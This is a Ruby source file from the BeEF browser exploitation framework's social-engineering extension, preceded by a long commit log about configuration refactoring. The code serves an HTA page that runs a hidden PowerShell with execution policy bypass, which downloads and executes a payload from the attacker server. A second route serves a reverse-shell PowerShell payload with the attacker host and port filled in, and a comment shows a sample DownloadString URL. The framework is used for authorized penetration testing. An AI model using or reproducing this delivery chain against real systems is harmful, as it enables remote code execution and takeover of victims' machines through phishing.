b6425e4a90
* fixed offline zombie not deleting * Bump jsdoc-to-markdown from 6.0.1 to 7.0.1 (#2161) Bumps [jsdoc-to-markdown](https://github.com/jsdoc2md/jsdoc-to-markdown) from 6.0.1 to 7.0.1. - [Release notes](https://github.com/jsdoc2md/jsdoc-to-markdown/releases) - [Commits](https://github.com/jsdoc2md/jsdoc-to-markdown/compare/v6.0.1...v7.0.1) --- updated-dependencies: - dependency-name: jsdoc-to-markdown dependency-type: direct:development update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> * Bug: Core - 1785 Fixed public hook url configuration settings (#2163) * added spec file for testing changes * added local host getter to configuration class * added default value 0.0.0.0 for local host if it's not set * added port config getter with default * added port config getter with default * fixed spelling errors for port * added public configuration values and validation * removed logic from public port as it was not required * added beef host to configuration class * added beef port to configuration class and removed default http.port logic from public_port * fixed rubocop errors and refactored spec tests * added beef host configuration values used for external resources * added beef url to configuration * added spec file for testing changes * added local host getter to configuration class * added default value 0.0.0.0 for local host if it's not set * added port config getter with default * added port config getter with default * fixed spelling errors for port * added public configuration values and validation * removed logic from public port as it was not required * added beef host to configuration class * added beef port to configuration class and removed default http.port logic from public_port * fixed rubocop errors and refactored spec tests * added beef host configuration values used for external resources * added beef url to configuration * created command spec file * add before statement to load all enabled modules to test command class * add spec to check if configuration instance exists by setting and accessing a config variable * updated http proto for beef host * reverting changes on this file, dev values set * removed some unessessary checks * fixed grammar test now we're only testing one configuration attribute * added hook url for contextual usage * refactoring admin_ui with new code usage * fixed issue with the location of the beef.http.https.public_enabled * refactored powershell module and extension * adding the new config setting for public https beign enabled * refactor qrcode extension * replace video fake plugin refactor * social engineering refactoring * phonegap module refactoring * exploit refactoing * network module refactoing * ipec module refactoring * host module refactoring * debug refactoring * browser refactoring * social engineering extension refactoring * core main server refactoring * core main console banner refactoring * removing dev test * fixed area with location of http.https.enabled * changed the hook url definition to return the hook file path * updated banners to use new configuration getters * updated extensions and modules with the hook url change * added new public.host configuration settings and validations for depicated usage of public * updated to use public.port configuration * added validation for old configuration public_port * updated to use public https configuration setting * updated config with new settings format * fixed get to point to new locations * fixed pointer to hook_file_path * Update extensions/social_engineering/web_cloner/web_cloner.rb Co-authored-by: bcoles <bcoles@gmail.com> * updated enabled to enable * making sure default configuration file does not have preset values Co-authored-by: bcoles <bcoles@gmail.com> * bumped versions to 0.5.2.0 * Usability: #2145. Added user input request for beef update within 'beef' install script (#2162) * added user input request for beef update * swaped git pull from system to backticks * flags added for auto update and timout to input * updated install.txt to reference the update-beef script (#2160) Co-authored-by: Andrew Wheatley <a@andrews-mini.home> Co-authored-by: Isaac Powell <36595182+DeezyE@users.noreply.github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: bcoles <bcoles@gmail.com>
63 lines
2.9 KiB
Ruby
63 lines
2.9 KiB
Ruby
#
|
|
# Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
|
|
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
|
# See the file 'doc/COPYING' for copying permission
|
|
#
|
|
module BeEF
|
|
module Extension
|
|
module SocialEngineering
|
|
|
|
#
|
|
# NOTE: the powershell_payload is work/copyright from @mattifestation (kudos for that)
|
|
# NOTE: the visual-basic macro code inside the Microsoft Office Word/Excel documents is work/copyright from @enigma0x3 (kudos for that)
|
|
#
|
|
# If you use the powershell payload for Office documents (extensions/social_engineering/powershell/msoffice_docs),
|
|
# make sure you edit the macro inside the sample documents.
|
|
# Change the default payload URL (DownloadString('http://172.16.37.1/ps/ps.png'))) with your BeEF server and powershell URL settings.
|
|
# By default powershell will be served from http://beef_server:beef_port/ps/ps.png
|
|
#
|
|
# NOTE: make sure you change the 'beef.http.public' variable in the main BeEF config.yaml to the specific IP where BeEF is binded to,
|
|
# and also the powershell-related variable in extensions/social_engineering/config.yaml
|
|
class Bind_powershell < BeEF::Core::Router::Router
|
|
before do
|
|
headers 'Pragma' => 'no-cache',
|
|
'Cache-Control' => 'no-cache',
|
|
'Expires' => '0'
|
|
end
|
|
|
|
# serves the HTML Application (HTA)
|
|
get '/hta' do
|
|
response['Content-Type'] = "application/hta"
|
|
@config = BeEF::Core::Configuration.instance
|
|
beef_url_str = @config.beef_url_str
|
|
ps_url = @config.get('beef.extension.social_engineering.powershell.powershell_handler_url')
|
|
payload_url = "#{beef_url_str}#{ps_url}/ps.png"
|
|
|
|
print_info "Serving HTA. Powershell payload will be retrieved from: #{payload_url}"
|
|
"<script>
|
|
var c = \"cmd.exe /c powershell.exe -w hidden -nop -ep bypass -c \\\"\\\"IEX ((new-object net.webclient).downloadstring('#{payload_url}')); Invoke-ps\\\"\\\"\";
|
|
new ActiveXObject('WScript.Shell').Run(c);
|
|
</script>"
|
|
end
|
|
|
|
# serves the powershell payload after modifying LHOST/LPORT
|
|
# The payload gets served via HTTP by default. Serving it via HTTPS it's still a TODO
|
|
get '/ps.png' do
|
|
response['Content-Type'] = "text/plain"
|
|
|
|
@ps_lhost = BeEF::Core::Configuration.instance.get('beef.extension.social_engineering.powershell.msf_reverse_handler_host')
|
|
@ps_port = BeEF::Core::Configuration.instance.get('beef.extension.social_engineering.powershell.msf_reverse_handler_port')
|
|
|
|
ps_payload_path = "#{$root_dir}/extensions/social_engineering/powershell/powershell_payload"
|
|
|
|
ps_payload = ''
|
|
if File.exist?(ps_payload_path)
|
|
ps_payload = File.read(ps_payload_path).gsub("___LHOST___", @ps_lhost).gsub("___LPORT___", @ps_port)
|
|
end
|
|
ps_payload
|
|
end
|
|
end
|
|
end
|
|
end
|
|
end
|